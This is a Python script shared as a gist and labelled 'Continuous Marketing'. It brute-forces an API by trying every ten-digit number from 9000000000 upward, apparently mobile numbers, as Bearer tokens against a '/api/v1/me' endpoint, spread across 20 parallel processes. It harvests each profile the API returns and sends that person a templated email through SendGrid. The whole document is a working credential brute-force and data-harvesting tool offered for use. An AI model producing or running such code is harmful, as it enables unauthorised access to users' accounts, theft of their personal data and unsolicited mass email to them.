[Continuous Marketing] Python script to brute force an api for emails and send a template email via sendgrid #api #bruteforce

continuous-marketing.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Insipired from the Brute force basic http auth script by zed
See https://gist.github.com/zed/0a8860f4f9a824561b51
"""
from __future__ import print_function
import sys
import time

from base64          import b64encode
from itertools       import repeat
from multiprocessing import Pool
from string          import digits
from timeit          import default_timer as timer
import json
import hashlib
from datetime import datetime
import sendgrid
import os
from sendgrid.helpers.mail import *

sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))

try:
    from httplib     import HTTPSConnection
except ImportError:
    from http.client import HTTPSConnection # py3k

try:
    from itertools   import izip as zip
except ImportError: # py3k
    zip = zip

def gen_passwords(): # ~400K/s
    for i in range(9000000000, 9999999999):
        yield i

def report_error(*args):
    print("error %s" % (args,), file=sys.stderr)

conn = None
def check(mobileno, nretries=3): # ~1100/s
    global conn  # use 1 connection per process
    if conn is None:
        conn = HTTPSConnection('localhost', 8080, timeout=10)
    headers = { 'Authorization' : 'Bearer '+ str(mobileno)}
    conn.request('GET', '/api/v1/me', headers=headers)
    r = conn.getresponse()
    try:
        res = json.loads(r.read().decode()) # should read before sending the next request
    except ValueError:
        if nretries > 0: # retry
            time.sleep(5./nretries**2)
            return check(mobileno, nretries=nretries-1)
        else:
            report_error((mobileno), "value error")

    #print(res)
    if r.status == 401:
        return
    elif r.status == 200:
            print(res)
            return res
    elif nretries > 0: # retry
        time.sleep(5./nretries**2)
        return check(mobileno, nretries=nretries-1)
    else:
        report_error((mobileno), r.status)

def send_email(profile):
    from_email = Email("[email protected]")
    to_email = Email("[email protected]")
    mail = Mail()
    mail.template_id = "263b3934-aa4b-40c7-9965-9e3c67628a1a"

    mail.from_email = from_email
    person = Personalization()
    person.add_to(Email(profile["email"]))
    #person.add_to(to_email)
    person.add_substitution(Substitution('%name%', profile["name"]))
    mail.add_personalization(person)

    response = sg.client.mail.send.post(request_body=mail.get())
    print(response.status_code)
    print(response.body)

def mp_check(args):
    global conn
    user = None
    try:
        user = check(args)
        if user == None:
            return
        if user["email"] == None:
            return
        return send_email(user) 
    except Exception as e:
        report_error(args, e)
        import traceback
        traceback.print_exc(file=sys.stderr)

        try: conn.close() # prevent fd leaks
        except: pass
        conn = None # reset connection

def main():
    start = timer()
    pool = Pool(processes=20)
    for n, found in enumerate(pool.imap_unordered(mp_check, gen_passwords()), 1):
        if found:
            print("found %s" % (found,))
            break
    t = timer() - start
    print("Processed %d passwords in %.2f seconds (%.0f p/s)" % (n, t, n/t))


if __name__=="__main__":
    main()